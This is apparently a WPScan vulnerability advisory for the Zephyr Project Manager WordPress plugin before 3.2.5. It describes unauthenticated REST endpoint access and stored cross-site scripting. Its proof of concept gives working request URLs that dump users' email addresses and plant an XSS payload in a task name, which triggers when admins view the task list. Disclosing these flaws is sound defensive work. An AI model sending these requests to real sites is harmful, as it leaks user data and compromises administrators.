WordPress Plugin Vulnerabilities
Zephyr Project Manager < 3.2.5 - Unauthorised REST Calls to Stored XSS
Description
The plugin does not have proper authorisation (even when the Require Authorisation for REST API Requests is enabled) in all its REST endpoints, allowing unauthenticated users to call them either directly. Furthermore, due to the lack of sanitisation and escaping, it could also allow them to perform Stored Cross-Site Scripting attacks against logged in admins
Proof of Concept
Get all users email addresses: http://example.com/wp-json/zephyr_project_manager/v1/users http://example.com/wp-json/zephyr_project_manager/v1/tasks/create/?name=%22%20style%3danimation-name%3arotation%20onanimationstart%3dalert(%2fXSS%2f)%2f%2f The XSS will be trigged when viewing a list where the tasks is displayed, for example All Tasks at /wp-admin/admin.php?page=zephyr_project_manager_tasks
Affects Plugins
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScan
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-08-29 (about 1 years ago)
Added
2022-08-29 (about 1 years ago)
Last Updated
2022-08-29 (about 1 years ago)